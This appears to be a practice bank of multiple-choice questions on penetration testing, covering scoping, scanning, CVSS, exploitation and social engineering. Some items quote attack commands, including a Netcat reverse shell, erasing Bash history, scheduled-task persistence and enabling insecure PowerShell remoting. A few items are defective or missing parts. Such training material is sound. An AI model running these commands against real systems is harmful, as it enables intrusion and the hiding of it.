Penetration Testing MCQ Questions (Practice)

 

1. Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?

A. SQL injection

B. VM escape

C. Buffer overflow

D. Cross-site scripting

2. What specialized type of legal document is often used to protect the confidentiality of data and other information that penetration testers may encounter?

A. An SOW

B. An NDA

C. An MSA

D. A noncompete

3. Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?

A. ZAP

B. Nessus

C. SonarQube

D. OLLYDBG

4. Matt is part of a penetration testing team and is using a standard toolkit developed by his team. He is executing a password cracking script named password.sh. What language is this script most likely written in?

A. PowerShell

B. Bash

C. Ruby

D. Python

 

 

5. Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?

A. Record the details in the penetration testing report.

B. Remediate the vulnerability that allowed her to gain access.

C. Report the potential compromise to the client.

D. No further action is necessary because Renee’s scope of work is limited to penetration testing.

6. Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?

A. Black box

B. Authenticated

C. Internal view

D. External view

7. Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently prevent the commands she inputs to a Bash shell from being logged, which of the following commands should she use?

A. history -c

B. kill -9 $$

C. echo "" > /~/.bash_history

D. ln /dev/null ~/.bash_history -sf

8. Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?

A. Nmap

B. Nikto

C. Wireshark

D. CeWL

 

 

9. Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?

A. OSINT

B. HSI

C. Background

D. None of the above

10. Which of the following activities constitutes a violation of integrity?

A. Systems were taken offline, resulting in a loss of business income.

B. Sensitive or proprietary information was changed or deleted.

C. Protected information was accessed or exfiltrated.

D. Sensitive personally identifiable information was accessed or exfiltrated.

11. Ted wants to scan a remote system using Nmap and uses the following command:

nmap 149.89.80.0/24

How many TCP ports will he scan?

A. 256

B. 1,000

C. 1,024

D. 65,535

12. Brian is conducting a thorough technical review of his organization’s web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?

A. Penetration testing

B. Vulnerability scanning

C. Remediation

D. Threat hunting

13. Liam executes the following command on a compromised system:

nc 10.1.10.1 7337 -e /bin/sh

What has he done?

A. Started a reverse shell using Netcat

B. Captured traffic on the Ethernet port to the console via Netcat

C. Set up a bind shell using Netcat

D. None of the above

14. Dan is attempting to use VLAN hopping to send traffic to VLANs other than the one he is on. What technique does the following diagram show?

[Diagram: an Ethernet frame laid out as Preamble, Destination MAC, Source MAC, 802.1Q header, 802.1Q header, Ethertype, Payload, CRC/FCS and Inter-frame Gap, with byte counts marked under each field; captioned "VLAN hopping attack"]

A. A double jump

B. A powerhop

C. Double tagging

D. VLAN squeezing

Assessment Test lix

15. Alaina wants to conduct a man-in-the-middle attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?

A. ARP spoofing

B. IP proofing

C. DHCP pirating

D. Spoofmastering

16. Michael’s social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?

A. Authority

B. Scarcity

C. Likeness

D. Social proof

17. Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on site via the network?

A. Shoulder surfing

B. Kerberoasting

C. USB key drop

D. Quid pro quo

18. Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?

-rwsr-xr-- 1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture

A. An encrypted file

B. A hashed file

C. A SUID file

D. A SIP file

19. Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?

A. Nmap

B. Traceroute

C. regmon

D. Whois

20. Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether the system is a VM or not?

A. Run system-detect-virt

B. Run ls -l /dev/disk/by-id

C. Run wmic baseboard to get manufacturer, product

D. Run dmidecode to retrieve hardware information

……………………………………………………………………………………………………….

1. Tom is running a penetration test in a web application and discovers a flaw that allows him to shut down the web server remotely. What goal of penetration testing has Tom most directly achieved?

A. Disclosure

B. Integrity

C. Alteration

D. Denial

2. Brian ran a penetration test against a school’s grading system and discovered a flaw that would allow students to alter their grades by exploiting a SQL injection vulnerability. What type of control should he recommend to the school’s cybersecurity team to prevent students from engaging in this type of activity?

A. Confidentiality

B. Integrity

C. Alteration

D. Availability

3. Edward Snowden gathered a massive quantity of sensitive information from the National Security Agency and released it to the media. What type of attack did he wage?

A. Disclosure

B. Denial

C. Alteration

D. Availability

4. Assuming no significant changes in an organization’s cardholder data environment, how often does PCI DSS require that a merchant accepting credit cards conduct penetration testing?

A. Monthly

B. Semiannually

C. Annually

D. Biannually

5. Which one of the following is NOT a benefit of using an internal penetration testing team?

A. Contextual knowledge

B. Cost

C. Subject matter expertise

D. Independence

6. Which one of the following is NOT a reason to conduct periodic penetration tests of systems and applications?

A. Changes in the environment

B. Cost

C. Evolving threats

D. New team members

7. Rich recently got into trouble with a client for using an attack tool during a penetration test that caused a system outage. During what stage of the penetration testing process should Rich and his clients have agreed upon the tools and techniques that he would use during the test?

A. Planning and Scoping

B. Information Gathering and Vulnerability Identification

C. Attacking and Exploiting

D. Reporting and Communication Results

8. Which one of the following steps of the Cyber Kill Chain does not map to the Attacking and Exploiting stage of the penetration testing process?

A. Weaponization

B. Reconnaissance

C. Installation

D. Actions on Objectives

 

9. Beth recently conducted a phishing attack against a penetration testing target in an attempt to gather credentials that she might use in later attacks. What stage of the penetration testing process is Beth in?

A. Planning and Scoping

B. Attacking and Exploiting

C. Information Gathering and Vulnerability Identification

D. Reporting and Communication Results

10. Which one of the following security assessment tools is not commonly used during the Information Gathering and Vulnerability Identification phase of a penetration test?

A. Nmap

B. Nessus

C. Metasploit

D. Nslookup

 

11. During what phase of the Cyber Kill Chain does an attacker steal information, use computing resources, or alter information without permission?

A. Weaponization

B. Installation

C. Actions on Objectives

D. Command and Control

12. Grace is investigating a security incident where the attackers left USB drives containing infected files in the parking lot of an office building. What stage in the Cyber Kill Chain describes this action?

A. Weaponization

B. Installation

C. Delivery

D. Command and Control

13. Which one of the following is not an open-source intelligence gathering tool?

A. WHOIS

B. Nslookup

C. Nessus

D. FOCA

14. Which one of the following tools is an exploitation framework commonly used by penetration testers?

A. Metasploit

B. Wireshark

C. Aircrack-ng

D. SET

15. Which one of the following tools is NOT a password cracking utility?

A. OWASP ZAP

B. Cain and Abel

C. Hashcat

D. Jack the Ripper

16. Which one of the following vulnerability scanners is specifically designed to test the security of web applications against a wide variety of attacks?

A. OpenVAS

B. Nessus

C. sqlmap

D. Nikto

17. Which one of the following debugging tools does not support Windows systems?

A. GDB

B. OllyDbg

C. WinDbg

D. IDA

18. What is the final stage of the Cyber Kill Chain?

A. Weaponization

B. Installation

C. Actions on Objectives

D. Command and Control

19. Which one of the following activities assumes that an organization has already been compromised?

A. Penetration testing

B. Threat hunting

C. Vulnerability scanning

D. Software testing

20. Alan is creating a list of recommendations that his organization can follow to remediate issues identified during a penetration test. In what phase of the testing process is Alan participating?

A. Planning and Scoping

B. Reporting and Communicating Results

C. Attacking and Exploiting

D. Information Gathering and Vulnerability Identification

…………………………………………………………………………………………………………………………

1. What term describes a document created to define project-specific activities, deliverables, and timelines based on an existing contract?

A. NDA

B. MSA

C. SOW

D. MOD

2. What type of language is WSDL based on?

A. HTML

B. XML

C. WSML

D. DIML

3. Which of the following types of penetration test would provide testers with complete visibility into the configuration of a web server without having to compromise the server to gain that information?

A. Black box

B. Gray box

C. White box

D. Red box

4. What type of legal agreement typically covers sensitive data and information that a penetration tester may encounter while performing an assessment?

A. A noncompete

B. An NDA

C. A data security agreement

D. A DSA

5. Which of the following threat actors is the most dangerous based on the adversary tier list?

A. APTs

B. Hacktivists

C. Insider threats

D. Organized crime

6. During a penetration test, Alex discovers that he is unable to scan a server that he was able to successfully scan earlier in the day from the same IP address. What has most likely happened?

A. His IP address was whitelisted.

B. The server crashed.

C. The network is down.

D. His IP address was blacklisted.

7. What does an MSA typically include?

A. The terms that will govern future agreements

B. Mutual support during assessments

C. Micro-services architecture

D. The minimum service level acceptable

8. While performing an on-site penetration test, Cassandra plugs her laptop into an accessible network jack. When she attempts to connect, however, she does not receive an IP address and gets no network connectivity. She knows that the port was working previously. What technology has her target most likely deployed?

A. Jack whitelisting

B. Jack blacklisting

C. NAC

D. 802.15

9. What type of penetration test is not aimed at identifying as many vulnerabilities as possible and instead focuses on vulnerabilities that specifically align with the goals of gaining control of specific systems or data?

A. An objectives-based assessment

B. A compliance-based assessment

C. A black-team assessment

D. A red-team assessment

10. During an on-site penetration test, what scoping element is critical for wireless assessments when working in shared buildings?

A. Encryption type

B. Wireless frequency

C. SSIDs

D. Preshared keys

11. What type of adversary is most likely to use only prewritten tools for their attacks?

A. APTs

B. Script kiddies

C. Hacktivists

D. Organized crime

12. During a penetration test specifically scoped to a single web application, Chris discovers that the web server also contains a list of passwords to other servers at the target location. After he notifies the client, they ask him to use them to validate those servers, and he proceeds to test those passwords against the other servers. What has occurred?

A. Malfeasance

B. Pivoting

C. Scope creep

D. Target expansion

13. Lucas has been hired to conduct a penetration test of an organization that processes credit cards. His work will follow the recommendations of the PCI DSS. What type of assessment is Lucas conducting?

A. An objectives-based assessment

B. A red-team assessment

C. A black-team assessment

D. A compliance-based assessment

14. The penetration testing agreement document that Greg asks his clients to sign includes a statement that the assessment is valid only at the point in time at which it occurs. Why does he include this language?

A. His testing may create changes.

B. The environment is unlikely to be the same in the future.

C. Attackers may use the same flaws to change the environment.

D. The test will not be fully comprehensive.

15. What penetration testing strategy is also known as “zero knowledge” testing?

A. Black box testing

B. Grey box testing

C. Red-team testing

D. White box testing

16. Susan’s organization uses a technique that associates hosts with their public keys. What type of technique are they using?

A. Key boxing

B. Certificate pinning

C. X.509 locking

D. Public key privacy

17. Charles has completed the scoping exercise for his penetration test and has signed the agreement with his client. Whose signature should be expected as the counter signature?

A. The information security officer

B. The project sponsor

C. The proper signing authority

D. An administrative assistant

18. Elaine wants to ensure that the limitations of her red-team penetration test are fully explained. Which of the following are valid disclaimers for her agreement? (Choose two.)

A. Risk tolerance

B. Point-in-time

C. Comprehensiveness

D. Impact tolerance

19. During the scoping phase of a penetration test, Lauren is provided with the IP range of the systems she will test, as well as information about what the systems run, but she does not receive a full network diagram. What type of assessment is she most likely conducting?

A. A white box assessment

B. A crystal box assessment

C. A gray box assessment

D. A black box assessment

20. What type of assessment most closely simulates an actual attacker’s efforts?

A. A red-team assessment with a black box strategy

B. A goals-based assessment with a white box strategy

C. A red-team assessment with a crystal box strategy

D. A compliance-based assessment with a black box strategy

…………………………………………………………………………………………………………………………

1. Mika runs the following Nmap scan:

nmap -sU -sT -p 1-65535 example.com

What information will she NOT receive?

A. TCP services

B. The state of the service

C. UDP services

D. MOD

2. What technique is being used in the following command:

host -t axfr domain.com dns1.domain.com

A. DNS query

B. Nslookup

C. Dig scan

D. Zone transfer

3. After running an Nmap scan of a system, Lauren discovers that TCP ports 139, 443, and 3389 are open. What operating system is she most likely to discover running on the system?

A. Windows

B. Android

C. Linux

D. iOS

4. Charles runs an Nmap scan using the following command:

nmap -sT -sV -T2 -p 1-65535 example.com

After watching the scan run for over two hours, he realizes that he needs to optimize the scan. Which of the following is not a useful way to speed up his scan?

A. Only scan via UDP to improve speed.

B. Change the scan timing to 3 or faster.

C. Change to a SYN scan.

D. Use the default port list.

5. Karen identifies TCP ports 8080 and 8443 open on a remote system during a port scan. What tool is her best option to manually validate what service is running on these ports?

A. SSH

B. SFTP

C. Telnet

D. A web browser

6. Angela recovered a PNG image during the early intelligence-gathering phase of a penetration test and wants to examine it for useful metadata. What tool could she most successfully use to do this?

A. ExifTool

B. Grep

C. PsTools

D. Nginx

7. During an Nmap scan, Casey uses the -O flag. The scan identifies the host as follows:

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.33

What can she determine from this information?

A. The Linux distribution installed on the target

B. The patch level of the installed Linux kernel

C. The date the remote system was last patched

D. That the system is running a Linux 2.6 kernel between .9 and .33

8. What is the full range of ports that a UDP service can run on?

A. 1–1024

B. 1–16,383

C. 1–32,767

D. 1–65,535

9. Steve is working from an unprivileged user account that was obtained as part of a penetration test. He has discovered that the host he is on has Nmap installed and wants to scan other hosts in his subnet to identify potential targets as part of a pivot attempt. What Nmap flag is he likely to have to use to successfully scan hosts from this account?

A. -sV

B. -u

C. -oA

D. -sT

10. Which of the following tools provides information about a domain’s registrar and physical location?

A. Nslookup

B. Host

C. WHOIS

D. Traceroute

11. Chris runs an Nmap scan of the 10.10.0.0/16 network that his employer uses as an internal network range for the entire organization. If he uses the -T0 flag, what issue is he likely to encounter?

A. The scan will terminate when the host count reaches 0.

B. The scan will not scan IP addresses in the .0 network.

C. The scan will progress at a very slow speed.

D. The scan will only scan for TCP services.

12. Which of the following Nmap output formats is unlikely to be useful for a penetration tester?

A. -oA

B. -oS

C. -oG

D. -oX

13. During an early phase of his penetration test, Mike recovers a binary executable file that he wants to quickly analyze for useful information. Which of the following tools will quickly give him a view of potentially useful information in the binary?

A. Netcat

B. strings

C. Hashmod

D. Eclipse

14. Jack is conducting a penetration test for a customer in Japan. What NIC is he most likely to need to check for information about his client’s networks?

A. RIPE

B. ARIN

C. APNIC

D. LACNIC

15. After running an SNMP sweep, Greg finds that he didn’t receive any results. If he knows there are no network protection devices in place and that there are devices that should respond to SNMP queries, what problem does he most likely have?

A. The SNMP private string is set.

B. There is an incorrect community string.

C. SNMP only works on port 25.

D. SNMP sweeps require the network to support broadcast traffic.

Review Questions 97

16. Charles uses the following hping command to send traffic to a remote system.

hping remotesite.com -S -V -p 80

What type of traffic will the remote system see?

A. HTTP traffic to TCP port 80

B. TCP SYNs to TCP port 80

C. HTTPS traffic to TCP port 80

D. A TCP three-way handshake to TCP port 80

17. What does a result of * * * mean during a traceroute?

A. No route to host.

B. All hosts queried.

C. No response to the query, perhaps a timeout, but traffic is going through.

D. A firewall is blocking responses.

18. Rick wants to look at the advertised routes to his target. What type of service should he look for to do this?

A. A BGP looking glass

B. A RIP-off

C. An IGRP relay

D. A BGP tunnel

19. Why would a penetration tester look for expired certificates as part of an information gathering and enumeration exercise?

A. They indicate improper encryption, allowing easy decryption of traffic.

B. They indicate services that may not be properly updated or managed.

C. Attackers install expired certificates to allow easy access to systems.

D. Penetration testers will not look for expired certificates; they only indicate procedural issues.

20. John has gained access to a system that he wants to use to gather more information about other hosts in its local subnet. He wants to perform a port scan but cannot install other tools to do so. Which of the following tools isn’t usable as a port scanner?

A. Hping

B. Netcat

C. Telnet

D. ExifTool

…………………………………………………………………………………………………………………………………..

1. Ryan is conducting a penetration test and is targeting a database server. Which one of the following tools would best assist him in detecting vulnerabilities on that server?

A. Nessus

B. Nikto

C. Sqlmap

D. OpenVAS

2. Gary is conducting a black box penetration test against an organization and is gathering vulnerability scanning results for use in his tests. Which one of the following scans is most likely to provide him with helpful information within the bounds of his test?

A. Stealth internal scan

B. Full internal scan

C. Stealth external scan

D. Full external scan

3. What tool can white box penetration testers use to help identify the systems present on a network prior to conducting vulnerability scans?

A. Asset inventory

B. Web application assessment

C. Router

D. DLP

4. Tonya is configuring vulnerability scans for a system that is subject to the PCI DSS compliance standard. What is the minimum frequency with which she must conduct scans?

A. Daily

B. Weekly

C. Monthly

D. Quarterly

5. Which one of the following is not an example of a vulnerability scanning tool?

A. QualysGuard

B. Snort

C. Nessus

D. OpenVAS


6. Which one of the following technologies, when used within an organization, is the LEAST likely to interfere with vulnerability scanning results achieved by external penetration testers?

A. Encryption

B. Firewall

C. Containerization

D. Intrusion prevention system

7. Renee is configuring her vulnerability management solution to perform credentialed scans of servers on her network. What type of account should she provide to the scanner?

A. Domain administrator

B. Local administrator

C. Root

D. Read-only

8. Jason is writing a report about a potential security vulnerability in a software product and wishes to use standardized product names to ensure that other security analysts understand the report. Which SCAP component can Jason turn to for assistance?

A. CVSS

B. CVE

C. CPE

D. OVAL

9. Ken is planning to conduct a vulnerability scan of an organization as part of a penetration test. He is conducting a black box test. When would it be appropriate to conduct an internal scan of the network?

A. During the planning stage of the test

B. As soon as the contract is signed

C. After receiving permission from an administrator

D. After compromising an internal host

10. Which type of organization is the most likely to face a regulatory requirement to conduct vulnerability scans?

A. Bank

B. Hospital

C. Government agency

D. Doctor’s office

11. Which one of the following categories of systems is most likely to be disrupted during a vulnerability scan?

A. External web server

B. Internal web server

C. IoT device

D. Firewall

12. What term describes an organization’s willingness to tolerate risk in their computing environment?

A. Risk landscape

B. Risk appetite

C. Risk level

D. Risk adaptation

13. Which one of the following factors is least likely to impact vulnerability scanning schedules?

A. Regulatory requirements

B. Technical constraints

C. Business constraints

D. Staff availability

14. Adam is conducting a penetration test of an organization and is reviewing the source code of an application for vulnerabilities. What type of code testing is Adam conducting?

A. Mutation testing

B. Static code analysis

C. Dynamic code analysis

D. Fuzzing

15. Ryan is planning to conduct a vulnerability scan of a business-critical system using dangerous plug-ins. What would be the best approach for the initial scan?

A. Run the scan against production systems to achieve the most realistic results possible.

B. Run the scan during business hours.

C. Run the scan in a test environment.

D. Do not run the scan to avoid disrupting the business.

16. Which one of the following activities is not part of the vulnerability management life cycle?

A. Detection

B. Remediation

C. Reporting

D. Testing

17. What approach to vulnerability scanning incorporates information from agents running on the target servers?

A. Continuous monitoring

B. Ongoing scanning

C. On-demand scanning

D. Alerting

18. Brian is seeking to determine the appropriate impact categorization for a federal information system as he plans the vulnerability scanning controls for that system. After consulting management, he discovers that the system contains information that, if disclosed improperly, would have a serious adverse impact on the organization. How should this system be categorized?

A. Low impact

B. Moderate impact

C. High impact

D. Severe impact

19. Jessica is reading reports from vulnerability scans run by different parts of her organization using different products. She is responsible for assigning remediation resources and is having difficulty prioritizing issues from different sources. What SCAP component can help Jessica with this task?

A. CVSS

B. CVE

C. CPE

D. XCCDF

20. Sarah is conducting a penetration test and discovers a critical vulnerability in an application. What should she do next?

A. Report the vulnerability to the client’s IT manager

B. Consult the SOW

C. Report the vulnerability to the developer

D. Exploit the vulnerability

…………………………………………………………………………………………………………………………………

1. Tom is reviewing a vulnerability scan report and finds that one of the servers on his network suffers from an internal IP address disclosure vulnerability. What protocol is likely in use on this network that resulted in this vulnerability?

A. TLS

B. NAT

C. SSH

D. VPN

2. Which one of the CVSS metrics would contain information about the number of times an attacker must successfully authenticate to execute an attack?

A. AV

B. C

C. Au

D. AC

3. Which one of the following values for the CVSS access complexity metric would indicate that the specified attack is simplest to exploit?

A. High

B. Medium

C. Low

D. Severe

4. Which one of the following values for the confidentiality, integrity, or availability CVSS metric would indicate the potential for total compromise of a system?

A. N

B. A

C. P

D. C

5. What is the most recent version of CVSS that is currently available?

A. 1.0

B. 2.0

C. 2.5

D. 3.0

6. Which one of the following metrics is not included in the calculation of the CVSS exploitability score?

A. Access vector

B. Vulnerability age

C. Access complexity

D. Authentication

7. Kevin recently identified a new security vulnerability and computed its CVSSv2 base score as 6.5. Which risk category would this vulnerability fall into?

A. Low

B. Medium

C. High

D. Critical

8. Tara recently analyzed the results of a vulnerability scan report and found that a vulnerability reported by the scanner did not exist because the system was actually patched as specified. What type of error occurred?

A. False positive

B. False negative

C. True positive

D. True negative

9. Which one of the following is not a common source of information that may be correlated with vulnerability scan results?

A. Logs

B. Database tables

C. SIEM

D. Configuration management system

10. Which one of the following operating systems should be avoided on production networks?

A. Windows Server 2003

B. Red Hat Enterprise Linux 7

C. CentOS 7

D. Ubuntu 16

11. In what type of attack does the attacker place more information in a memory location than is allocated for that use?

A. SQL injection

B. LDAP injection

C. Cross-site scripting

D. Buffer overflow

12. The Dirty COW attack is an example of what type of vulnerability?

A. Malicious code

B. Privilege escalation

C. Buffer overflow

D. LDAP injection

13. Which one of the following protocols should never be used on a public network?

A. SSH

B. HTTPS

C. SFTP

D. Telnet

14. Betty is selecting a transport encryption protocol for use in a new public website she is creating. Which protocol would be the best choice?

A. SSL 2.0

B. SSL 3.0

C. TLS 1.0

D. TLS 1.1

15. Which one of the following conditions would not result in a certificate warning during a vulnerability scan of a web server?

A. Use of an untrusted CA

B. Inclusion of a public encryption key

C. Expiration of the certificate

D. Mismatch in certificate name

16. What software component is responsible for enforcing the separation of guest systems in a virtualized infrastructure?

A. Guest operating system

B. Host operating system

C. Memory controller

D. Hypervisor

17. In what type of attack does the attacker seek to gain access to resources assigned to a different virtual machine?

A. VM escape

B. Management interface brute force

C. LDAP injection

D. DNS amplification


18. Which one of the following terms is not typically used to describe the connection of physical devices to a network?

A. IoT

B. IDS

C. ICS

D. SCADA

19. Monica discovers that an attacker posted a message attacking users who visit a web forum that she manages. Which one of the following attack types is most likely to have occurred?

A. SQL injection

B. Malware injection

C. LDAP injection

D. Cross-site scripting

20. Alan is reviewing web server logs after an attack and finds many records that contain semicolons and apostrophes in queries from end users. What type of attack should he suspect?

A. SQL injection

B. LDAP injection

C. Cross-site scripting

D. Buffer overflow

………………………………………………………………………………………………………………………….

2. Which of the entries should Charles prioritize from this list if he wants to gain access to the system?

A. The Ruby on Rails vulnerability

B. The OpenSSH vulnerability

C. The MySQL vulnerability

D. None of these; he should find another target.

3. If Charles wants to build a list of additional system user accounts, which of the vulnerabilities is most likely to deliver that information?

A. The Ruby on Rails vulnerability

B. The OpenSSH vulnerability

C. The MySQL vulnerability

D. Both the OpenSSH and MySQL vulnerabilities

4. If Charles selects the Ruby on Rails vulnerability, which of the following methods cannot be used to search for an existing Metasploit vulnerability?

A. CVE

B. BID

C. MSF

D. EDB

5. Matt wants to pivot from a Linux host to other hosts in the network but is unable to install additional tools beyond those found on a typical Linux server. How can he leverage the system he is on to allow vulnerability scans of those remote hosts if they are firewalled against inbound connections and protected from direct access from his penetration testing workstation?

A. SSH tunneling

B. Netcat port forwarding

C. Enable IPv6

D. Modify browser plug-ins

6. After gaining access to a Windows system, Fred uses the following command:

SchTasks /create /SC Weekly /TN "Antivirus" /TR "C:\Users\SSmith\av.exe" /ST 09:00

What has he accomplished?

A. He has set up a weekly antivirus scan.

B. He has set up a job called “weekly.”

C. He has scheduled his own executable to run weekly.

D. Nothing; this command will only run on Linux.

7. After gaining access to a Linux system through a vulnerable service, Cassandra wants to list all of the user accounts on the system and their home directories. Which of the following locations will provide this list?

A. /etc/shadow

B. /etc/passwd

C. /var/usr

D. /home

8. A few days after exploiting a target with the Metasploit Meterpreter payload, Robert loses access to the remote host. A vulnerability scan shows that the vulnerability that he used to exploit the system originally is still open. What has most likely happened?

A. A malware scan discovered Meterpreter and removed it.

B. The system was patched.

C. The system was rebooted.

D. Meterpreter crashed.

9. Angela wants to run John the Ripper against a hashed password file she has acquired from a compromise. What information does she need to know to successfully crack the file?

A. A sample word list

B. The hash used

C. The number of passwords

D. None of the above

10. Chris cross-compiles code for his exploit and then deploys it. Why would he cross-compile code?

A. To make it run on multiple platforms

B. To add additional libraries

C. To run it on a different architecture

D. To allow him to inspect the source code

11. Lauren has acquired a list of valid user accounts but does not have passwords for them. If she has not found any vulnerabilities but believes that the organization she is targeting has poor password practices, what type of attack can she use to try to gain access to a target system where those usernames are likely valid?

A. Rainbow tables

B. Dictionary attacks

C. Thesaurus attacks

D. Meterpreter

12. What built-in Windows server administration tool can allow command-line PowerShell access from other systems?

A. VNC

B. PowerSSHell

C. PSRemote

D. RDP

13. John wants to retain access to a Linux system. Which of the following is not a common method of maintaining persistence on Linux servers?

A. Scheduled tasks

B. Cron jobs

C. Trojaned services

D. Modified daemons

14. Tim has selected his Metasploit exploit and set his payload as cmd/unix/generic. After attempting the exploit, he receives the following output. What went wrong?

A. The remote host is firewalled.

B. The remote host is not online.

C. The host is not routable.

D. The remote host was not set.

15. Cameron runs the following command via an administrative shell on a Windows system he has compromised. What has he accomplished?

$command = 'cmd /c powershell.exe -c Set-WSManQuickConfig -Force;Set-Item WSMan:\localhost\Service\Auth\Basic -Value $True;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $True;Register-PSSessionConfiguration -Name Microsoft.PowerShell -Force'

A. He has enabled PowerShell for local users.

B. He has set up PSRemoting.

C. He has disabled remote command-line access.

D. He has set up WSMan.

16. Mike discovers a number of information exposure vulnerabilities while preparing for the exploit phase of a penetration test. If he has not been able to identify user or service information beyond vulnerability details, what priority should he place on exploiting them?

A. High priority; exploit early.

B. Medium priority; exploit after other system and service exploits have been attempted.

C. Low priority; only exploit if time permits.

D. Do not exploit; information exposure exploits are not worth conducting.

17. Part of Annie’s penetration testing scope of work and rules of engagement allows her physical access to the facility she is testing. If she cannot find a remotely exploitable service, which of the following social engineering methods is most likely to result in remote access?

A. Dumpster diving

B. Phishing

C. A thumb drive drop

D. Impersonation on a help desk call

18. Jacob wants to capture user hashes on a Windows network. Which tool could he select to gather these from broadcast messages?

A. Metasploit

B. Responder

C. Impacket

D. Wireshark


19. Cynthia wants to find a Metasploit framework exploit that will not crash the remote service she is targeting. What ranking must the exploit she chooses meet or exceed to ensure this?

A. Excellent

B. Great

C. Good

D. Normal

20. Alex wants to use rainbow tables against a password file she has captured. How do rainbow tables crack passwords?

A. Un-hashing the passwords

B. Comparing hashes to identify known values

C. Decrypting the passwords

D. Brute-force testing of hashes

………………………………………………………………………………………………………………………..

1. Cynthia wants to use a phishing attack to acquire credentials belonging to the senior leadership of her target. What type of phishing attack should she use?

A. Smishing

B. VIPhishing

C. Whaling

D. Spear phishing

2. Mike wants to enter an organization’s high-security data center. Which of the following techniques is most likely to stop his tailgating attempt?

A. Security cameras

B. A mantrap

C. An egress sensor

D. An RFID badge reader

3. Which of the following technologies is most resistant to badge cloning attacks if implemented properly?

A. Low frequency RFID

B. Magstripes

C. Medium frequency RFID

D. Smart cards

Use the following scenario for questions 4, 5, and 6.

Jen has been contracted to perform a penetration test against Flamingo, Inc. As part of her penetration test, she has been asked to conduct a phishing campaign and to use the results of that campaign to gain access to Flamingo systems and networks. The scope of the penetration test does not include a physical penetration test, so Jen must work entirely remotely.

4. Jen wants to send a phishing message to employees at the company. She wants to learn the user IDs of various targets in the company and decides to call them using a spoofed VoIP phone number similar to those used inside the company. Once she reaches her targets, she pretends to be an administrative assistant working with one of Flamingo’s senior executives and asks her targets for their email account information. What type of social engineering is this?

A. Impersonation

B. Interrogation

C. Shoulder surfing

D. Administrivia


5. Jen wants to deploy a malicious website as part of her penetration testing attempt so that she can exploit browsers belonging to employees. What framework is best suited to this?

A. Metasploit

B. BeEF

C. SET

D. OWASP

6. After attempting to lure employees at Flamingo, Inc., to fall for a phishing campaign, Jen finds that she hasn’t acquired any useful credentials. She decides to try a USB keydrop. Which of the following Social Engineering Toolkit modules should she select to help her succeed?

A. The website attack vectors module

B. The Infectious Media Generator

C. The Mass Mailer Module

D. The Teensy USB HID attack module

7. Chris sends a phishing email specifically to Susan, the CEO at his target company. What type of phishing attack is he conducting?

A. CEO baiting

B. Spear phishing

C. Phish hooking

D. Hook SETting

8. While Frank is performing a physical penetration test, he notices that the exit doors to the data center open automatically as an employee approaches them with a cart. What should he record in his notes?

A. The presence of an egress sensor

B. The presence of a mantrap

C. A potential unlocked door

D. Nothing because this is not a vulnerability

9. Emily wants to gather information about an organization, but does not want to enter the building. What physical data gathering technique can she use to potentially gather business documents without entering the building?

A. Piggybacking

B. File surfing

C. USB drops

D. Dumpster diving

Chapter 8: Exploiting Physical and Social Vulnerabilities

10. Cameron is preparing to travel to another state to perform a physical penetration test. What penetration testing gear should he review the legality of before leaving for that state?

A. Metasploit

B. Lockpicks

C. Encryption tools

D. SET

11. Which social engineering motivation technique relies on persuading the target that other people have behaved similarly and thus that they could too?

A. Likeness

B. Fear

C. Social proof

D. Reciprocation

12. What is the default read-only community string for many SNMP devices?

A. secret

B. readonly

C. private

D. public

13. Allan wants to gain access to a target company’s premises but discovers that his original idea of jumping the fence probably isn’t practical. Which factor is least likely to prevent him from trying to jump the fence?

A. Barbed wire

B. A gate

C. Fence height

D. Security guards

14. Charles sends a phishing email to a target organization and includes the line “Only five respondents will receive a cash prize.” Which social engineering motivation strategy is he using?

A. Scarcity

B. Social proof

C. Fear

D. Authority

15. What occurs during a quid pro quo social engineering attempt?

A. The target is offered money.

B. The target is asked for money.

C. The target is made to feel indebted.

D. The penetration tester is made to feel indebted.


16. Andrew knows that the employees at his target company frequently visit a football discussion site popular in the local area. As part of his penetration testing, he successfully places malware on the site and takes over multiple PCs belonging to employees. What type of attack has he used?

A. A PWNie attack

B. A watercooler attack

C. A clone attack

D. A watering hole attack

17. Steve inadvertently sets off an alarm and is discovered by a security guard during an on-site penetration test. What should his first response be?

A. Call the police

B. Attempt to escape

C. Provide his pretext

D. Call his organizational contact

18. A USB key drop is an example of what type of technique?

A. Physical honeypot

B. A humanitarian exploit

C. Reverse dumpster diving

D. A hybrid attack

19. Susan calls staff at the company she has been contracted to conduct a phishing campaign against, focusing on individuals in the finance department. Over a few days, she persuades an employee to send a wire transfer to an account she has set up after telling the employee that she has let their boss know how talented they are. What motivation technique has she used?

A. Urgency

B. Reciprocation

C. Authority

D. Fear

20. Alexa carefully pays attention to an employee as they type in their entry code to her target organization’s high security area and writes down the code that she observes. What type of attack has she conducted?

A. A Setec Astronomy attack

B. Code surveillance

C. Shoulder surfing

D. Keypad capture

………………………………………………………………………………………………………………………………….
